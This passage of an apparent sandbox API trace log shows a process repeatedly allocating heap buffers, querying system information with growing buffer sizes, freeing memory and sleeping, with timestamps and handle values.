returned 0xc0000004 [0254.015] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0254.016] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0254.016] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0254.016] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0254.016] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b640 [0254.016] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b640, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b640, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0254.017] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b640 | out: hHeap=0x2560000) returned 1 [0254.017] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c9c8 [0254.017] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c9c8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c9c8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0254.017] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c9c8 | out: hHeap=0x2560000) returned 1 [0254.017] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0254.017] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0254.017] Sleep (dwMilliseconds=0x110) [0254.139] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0254.139] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0254.234] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0254.234] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a748 [0254.234] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a748, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a748, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0254.234] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a748 | out: hHeap=0x2560000) returned 1 [0254.234] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c350 [0254.234] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c350, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c350, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0254.235] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c350 | out: hHeap=0x2560000) returned 1 [0254.235] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0254.235] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0254.236] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0254.236] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0254.236] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0254.236] Sleep (dwMilliseconds=0x110) [0254.307] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0254.307] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0254.308] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0254.308] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ab58 [0254.308] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ab58, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ab58, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0254.309] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ab58 | out: hHeap=0x2560000) returned 1 [0254.309] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0254.309] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0254.309] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0254.310] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d198 [0254.310] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d198, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d198, ResultLength=0x19ee88*=0xc0) returned 0x0 [0254.311] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d198 | out: hHeap=0x2560000) returned 1 [0254.311] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0254.312] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0254.312] Sleep (dwMilliseconds=0x110) [0254.467] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0254.467] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0254.468] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0254.468] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0254.468] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0254.468] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0254.468] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c3e8 [0254.468] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c3e8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c3e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0254.469] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c3e8 | out: hHeap=0x2560000) returned 1 [0254.469] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c900 [0254.469] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c900, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c900, ResultLength=0x19ee88*=0xc0) returned 0x0 [0254.469] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c900 | out: hHeap=0x2560000) returned 1 [0254.469] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0254.470] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0254.470] Sleep (dwMilliseconds=0x110) [0255.135] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0255.135] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0255.162] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0255.162] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aaf0 [0255.162] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aaf0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aaf0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0255.162] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aaf0 | out: hHeap=0x2560000) returned 1 [0255.162] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b938 [0255.162] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b938, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b938, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0255.163] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b938 | out: hHeap=0x2560000) returned 1 [0255.167] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0255.168] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0255.168] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0255.181] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0255.182] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0255.182] Sleep (dwMilliseconds=0x110) [0255.318] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0255.318] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0255.318] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0255.318] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a610 [0255.318] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a610, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a610, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0255.319] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a610 | out: hHeap=0x2560000) returned 1 [0255.319] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c2b8 [0255.319] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c2b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c2b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0255.320] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c2b8 | out: hHeap=0x2560000) returned 1 [0255.324] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0255.324] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0255.324] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0255.324] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0255.325] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0255.326] Sleep (dwMilliseconds=0x110) [0255.374] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0255.374] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0255.375] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0255.375] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0255.375] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0255.375] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0255.375] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295be90 [0255.376] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295be90, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295be90, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0255.376] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295be90 | out: hHeap=0x2560000) returned 1 [0255.376] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d260 [0255.376] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d260, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d260, ResultLength=0x19ee88*=0xc0) returned 0x0 [0255.377] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d260 | out: hHeap=0x2560000) returned 1 [0255.377] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0255.377] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0255.377] Sleep (dwMilliseconds=0x110) [0255.397] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0255.397] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0255.398] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0255.398] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0255.398] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0255.398] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0255.398] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b640 [0255.399] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b640, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b640, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0255.399] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b640 | out: hHeap=0x2560000) returned 1 [0255.404] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0255.404] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0255.404] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0255.404] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0255.404] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0255.404] Sleep (dwMilliseconds=0x110) [0255.427] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0255.427] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0255.428] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0255.428] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0255.428] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0255.429] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0255.429] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0255.429] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0255.429] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0255.476] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0255.476] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0255.477] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0255.482] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0255.483] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0255.483] Sleep (dwMilliseconds=0x110) [0255.837] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0255.837] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0255.838] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0255.838] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a610 [0255.838] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a610, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a610, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0255.838] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a610 | out: hHeap=0x2560000) returned 1 [0255.845] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bf28 [0255.845] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bf28, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bf28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0255.846] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bf28 | out: hHeap=0x2560000) returned 1 [0255.846] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0255.846] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0255.846] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0255.846] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0255.847] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0255.847] Sleep (dwMilliseconds=0x110) [0255.894] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0255.894] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0255.895] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0255.895] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0255.895] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0255.896] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0255.896] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295be90 [0255.896] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295be90, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295be90, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0255.896] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295be90 | out: hHeap=0x2560000) returned 1 [0255.896] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0255.896] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0255.897] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0255.897] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0255.897] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0255.897] Sleep (dwMilliseconds=0x110) [0255.907] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0255.907] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0255.908] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0255.908] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0255.908] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0255.908] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0255.909] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bf28 [0255.909] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bf28, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bf28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0255.909] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bf28 | out: hHeap=0x2560000) returned 1 [0255.913] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0255.913] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0255.913] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0255.913] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0255.914] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0255.914] Sleep (dwMilliseconds=0x110) [0255.919] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0255.919] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0255.920] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0255.920] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0255.920] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0255.920] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0255.920] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0255.920] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0255.921] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0255.921] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0255.921] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0255.925] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0255.925] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0255.925] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0255.925] Sleep (dwMilliseconds=0x110) [0255.944] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7f8 [0255.944] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7f8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7f8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0255.945] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7f8 | out: hHeap=0x2560000) returned 1 [0255.945] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0255.945] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0255.946] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0255.946] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0255.946] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0255.946] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0255.951] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c518 [0255.951] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c518, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c518, ResultLength=0x19ee88*=0xc0) returned 0x0 [0255.953] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c518 | out: hHeap=0x2560000) returned 1 [0255.953] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0255.953] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0255.953] Sleep (dwMilliseconds=0x110) [0255.970] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, 